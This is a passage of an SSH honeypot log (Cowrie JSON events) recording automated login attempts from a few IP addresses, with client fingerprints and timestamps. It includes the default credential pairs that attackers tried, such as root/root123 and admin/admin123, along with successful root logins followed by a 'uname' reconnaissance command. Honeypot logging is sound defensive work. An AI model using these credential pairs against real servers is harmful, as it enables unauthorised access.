com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:46:33.445431Z","src_ip":"212.227.235.229","session":"95e9b776585c"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"jenkins","message":"login attempt [jenkins/jenkins] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:33.932682Z","src_ip":"212.227.235.229","session":"95e9b776585c"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:35.080472Z","src_ip":"212.227.235.229","session":"95e9b776585c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47402,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c2d854177a5","protocol":"ssh","message":"New connection: 212.227.125.160:47402 (1.2.3.4:22) [session: 0c2d854177a5]","sensor":"my-vps","timestamp":"2025-08-28T05:46:37.966046Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:46:38.017974Z","src_ip":"212.227.125.160","session":"0c2d854177a5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:46:38.071347Z","src_ip":"212.227.125.160","session":"0c2d854177a5"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:46:38.491217Z","src_ip":"212.227.125.160","session":"0c2d854177a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:46:38.786694Z","src_ip":"212.227.125.160","session":"0c2d854177a5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:46:38.787343Z","src_ip":"212.227.125.160","session":"0c2d854177a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:38.893681Z","src_ip":"212.227.125.160","session":"0c2d854177a5"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:38.894881Z","src_ip":"212.227.125.160","session":"0c2d854177a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35754,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4962b8025cc","protocol":"ssh","message":"New connection: 212.227.235.229:35754 (1.2.3.4:22) [session: a4962b8025cc]","sensor":"my-vps","timestamp":"2025-08-28T05:46:45.071307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:46:45.079453Z","src_ip":"212.227.235.229","session":"a4962b8025cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:46:45.216210Z","src_ip":"212.227.235.229","session":"a4962b8025cc"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:46:45.793469Z","src_ip":"212.227.235.229","session":"a4962b8025cc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:46:46.100415Z","src_ip":"212.227.235.229","session":"a4962b8025cc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:46:46.101107Z","src_ip":"212.227.235.229","session":"a4962b8025cc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:46.247729Z","src_ip":"212.227.235.229","session":"a4962b8025cc"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:46.248812Z","src_ip":"212.227.235.229","session":"a4962b8025cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":20536,"dst_ip":"1.2.3.4","dst_port":22,"session":"1053aa3c093d","protocol":"ssh","message":"New connection: 212.227.235.229:20536 (1.2.3.4:22) [session: 1053aa3c093d]","sensor":"my-vps","timestamp":"2025-08-28T05:46:49.316021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:46:49.316852Z","src_ip":"212.227.235.229","session":"1053aa3c093d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:46:49.424059Z","src_ip":"212.227.235.229","session":"1053aa3c093d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"biggirl","message":"login attempt [admin/biggirl] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:49.936708Z","src_ip":"212.227.235.229","session":"1053aa3c093d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beyond","message":"login attempt [admin/beyond] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:51.046445Z","src_ip":"212.227.235.229","session":"1053aa3c093d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beyonce","message":"login attempt [admin/beyonce] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:52.156582Z","src_ip":"212.227.235.229","session":"1053aa3c093d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35640,"dst_ip":"1.2.3.4","dst_port":22,"session":"570009d9f951","protocol":"ssh","message":"New connection: 212.227.125.160:35640 (1.2.3.4:22) [session: 570009d9f951]","sensor":"my-vps","timestamp":"2025-08-28T05:46:52.621298Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:46:52.622751Z","src_ip":"212.227.125.160","session":"570009d9f951"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:46:52.727528Z","src_ip":"212.227.125.160","session":"570009d9f951"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:53.044639Z","src_ip":"212.227.125.160","session":"570009d9f951"}
{"eventid":"cowrie.login.failed","username":"admin","password":"beepbeep","message":"login attempt [admin/beepbeep] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:53.265656Z","src_ip":"212.227.235.229","session":"1053aa3c093d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:54.152180Z","src_ip":"212.227.125.160","session":"570009d9f951"}
{"eventid":"cowrie.login.failed","username":"admin","password":"becky1","message":"login attempt [admin/becky1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:46:54.375383Z","src_ip":"212.227.235.229","session":"1053aa3c093d"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:46:55.484735Z","src_ip":"212.227.235.229","session":"1053aa3c093d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55396,"dst_ip":"1.2.3.4","dst_port":22,"session":"adbef565d61c","protocol":"ssh","message":"New connection: 212.227.235.229:55396 (1.2.3.4:22) [session: adbef565d61c]","sensor":"my-vps","timestamp":"2025-08-28T05:47:02.735255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:47:02.736157Z","src_ip":"212.227.235.229","session":"adbef565d61c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:47:02.879281Z","src_ip":"212.227.235.229","session":"adbef565d61c"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin123","message":"login attempt [admin/admin123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:47:03.311070Z","src_ip":"212.227.235.229","session":"adbef565d61c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:04.457111Z","src_ip":"212.227.235.229","session":"adbef565d61c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33302,"dst_ip":"1.2.3.4","dst_port":22,"session":"66ea54e3be91","protocol":"ssh","message":"New connection: 212.227.235.229:33302 (1.2.3.4:22) [session: 66ea54e3be91]","sensor":"my-vps","timestamp":"2025-08-28T05:47:14.525255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:47:14.527363Z","src_ip":"212.227.235.229","session":"66ea54e3be91"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:47:14.671498Z","src_ip":"212.227.235.229","session":"66ea54e3be91"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-28T05:47:15.105111Z","src_ip":"212.227.235.229","session":"66ea54e3be91"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:47:16.251197Z","src_ip":"212.227.235.229","session":"66ea54e3be91"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":55024,"dst_ip":"1.2.3.4","dst_port":22,"session":"e29e165f2a8e","protocol":"ssh","message":"New connection: 139.19.117.131:55024 (1.2.3.4:22) [session: e29e165f2a8e]","sensor":"my-vps","timestamp":"2025-08-28T05:47:17.370917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:47:17.371857Z","src_ip":"139.19.117.131","session":"e29e165f2a8e"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T05:47:17.388197Z","src_ip":"139.19.117.131","session":"e29e165f2a8e"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","sensor":"my-vps","timestamp":"2025-08-28T05:47:17.422823Z","src_ip":"139.19.117.131","session":"e29e165f2a8e"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T05:47:17.423466Z","src_ip":"139.19.117.131","session":"e29e165f2a8e"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key attempt for user root of type 